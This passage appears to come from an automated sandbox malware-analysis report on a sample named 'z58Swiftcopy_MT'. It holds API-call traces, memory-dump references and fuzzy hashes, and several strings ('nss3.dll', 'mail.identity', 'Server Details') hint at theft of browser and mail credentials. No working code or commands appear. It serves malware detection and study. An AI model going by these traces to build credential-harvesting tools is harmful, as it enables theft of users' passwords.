                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BCA4
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041BCEC
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041BD07
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memcmp
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3384217055-0
                                                                                                                                                                                                                                      • Opcode ID: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                                                                                                                                                                                                      • Instruction ID: 8228d9f6412a3e952053f7d3f56c39de874a44e07f5fc6281cc9d0b5593e34d3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8215172E102896BEB19DBA5D846FAF73FCEB84700F00446AB511D7281FB28E644C765
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@$memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1860491036-0
                                                                                                                                                                                                                                      • Opcode ID: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                                                                                                                                                                                                      • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004048C2
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004048D6
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004048EA
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$memcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 368790112-0
                                                                                                                                                                                                                                      • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                                                                                                                                                      • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D319
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$memcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 368790112-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • too many SQL variables, xrefs: 0042C6FD
                                                                                                                                                                                                                                      • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                                      • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                                                                                                                                      • API String ID: 2221118986-515162456
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004026AD
                                                                                                                                                                                                                                        • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                                                                                                                                        • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                                                                                                                                        • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                                                                                                                                        • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3503910906-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00407948: free.MSVCRT ref: 0040794B
                                                                                                                                                                                                                                        • Part of subcall function 00407948: free.MSVCRT ref: 00407953
                                                                                                                                                                                                                                      • free.MSVCRT ref: 00407D7C
                                                                                                                                                                                                                                        • Part of subcall function 00407A1F: free.MSVCRT ref: 00407A2E
                                                                                                                                                                                                                                        • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                                                                                                                                                                        • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,00000000,00000000,`-v,00407A43,00000001,?,00000000,`-v,00407DBD,00000000,?,?), ref: 00406F64
                                                                                                                                                                                                                                        • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$mallocmemcpy
                                                                                                                                                                                                                                      • String ID: `-v$`-v$`-v
                                                                                                                                                                                                                                      • API String ID: 3401966785-2491953119
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C922
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                                                                                                                                                                                                      • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                                                                                                                                                                                                      • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Message$MenuPostSendStringmemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3798638045-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000), ref: 00409E0E
                                                                                                                                                                                                                                        • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 00409ED5
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040B60B
                                                                                                                                                                                                                                      • atoi.MSVCRT(?,00000000,?,762D0A60,?,00000000), ref: 0040B619
                                                                                                                                                                                                                                      • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                                                                                                                                                                      • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4107816708-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: strlen
                                                                                                                                                                                                                                      • String ID: >$>$>
                                                                                                                                                                                                                                      • API String ID: 39653677-3911187716
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                      • API String ID: 3510742995-2766056989
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _strcmpi
                                                                                                                                                                                                                                      • String ID: C@$mail.identity
                                                                                                                                                                                                                                      • API String ID: 1439213657-721921413
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00406640
                                                                                                                                                                                                                                        • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                                                                                                                                                        • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                                                                                                        • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memset$memcmp
                                                                                                                                                                                                                                      • String ID: Ul@
                                                                                                                                                                                                                                      • API String ID: 270934217-715280498
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                                                                                                                                                                        • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,762D0A60), ref: 00408EBE
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040B929
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                                                                                                                                        • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,762D0A60), ref: 00408E31
                                                                                                                                                                                                                                        • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040B953
                                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040B966
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 203655857-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _ultoasprintf
                                                                                                                                                                                                                                      • String ID: %s %s %s
                                                                                                                                                                                                                                      • API String ID: 432394123-3850900253
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040909B
                                                                                                                                                                                                                                        • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                                                                                                                                                                        • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                                                                                                                                                        • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                                                                                                                                                        • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                                                                                                                                                        • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                                                                                                                                                        • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                                                                                                                                                        • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                                                                                                                                                      • String ID: menu_%d
                                                                                                                                                                                                                                      • API String ID: 1129539653-2417748251
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _msizerealloc
                                                                                                                                                                                                                                      • String ID: failed memory resize %u to %u bytes
                                                                                                                                                                                                                                      • API String ID: 2713192863-2134078882
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104,?), ref: 00406FA1
                                                                                                                                                                                                                                      • strrchr.MSVCRT ref: 00409808
                                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040981D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileModuleName_mbscatstrrchr
                                                                                                                                                                                                                                      • String ID: _lng.ini
                                                                                                                                                                                                                                      • API String ID: 3334749609-1948609170
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                                                                        • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                                                                                                        • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _mbscat$_mbscpystrlen
                                                                                                                                                                                                                                      • String ID: sqlite3.dll
                                                                                                                                                                                                                                      • API String ID: 1983510840-1155512374
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 004073D0
                                                                                                                                                                                                                                      • SetWindowLongA.USER32(00000001,000000EC,00000000), ref: 004073E2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LongWindow
                                                                                                                                                                                                                                      • String ID: MZ@
                                                                                                                                                                                                                                      • API String ID: 1378638983-2978689999
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfileString
                                                                                                                                                                                                                                      • String ID: A4@$Server Details
                                                                                                                                                                                                                                      • API String ID: 1096422788-4071850762
                                                                                                                                                                                                                                      • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                                                                                                                                                      • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?), ref: 0042C917
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0042C932
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 438689982-0
                                                                                                                                                                                                                                      • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                                                                                                                                                      • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040849A
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004084D2
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,7693E430,?,00000000), ref: 0040858F
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,?,?,?,7693E430,?,00000000), ref: 004085BA
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
